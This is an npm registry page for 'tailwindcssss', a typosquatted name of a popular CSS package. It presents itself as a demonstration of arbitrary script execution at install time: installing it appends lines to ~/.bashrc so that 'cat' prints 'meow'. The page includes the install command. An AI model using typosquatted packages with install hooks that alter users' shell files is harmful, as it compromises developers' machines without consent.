tailwindcssss

1.11.0 • Public • Published

NPM ASE

Arbitrary Script Execution with the Node Package Manager.

Description

This project implements an NPM package published under the sik-asn user called tailwindcssss. The package is an example of how NPM allows for ASE by a package-author on any bash-compatible laptop that installs the module.

cat ~/.bashrc   # => prints file-contents
npm install tailwindcssss
cat ~/.bashrc   # => "meow"
cat             # => "meow"

You can undo the changes from installing the package by removing the appended lines inside ~/.bashrc.

Readme

Keywords

none

Package Sidebar

Install

npm i tailwindcssss

Weekly Downloads

1,239

Version

1.11.0

License

MIT

Unpacked Size

1.12 kB

Total Files

4

Last publish

Collaborators

  • sik-asn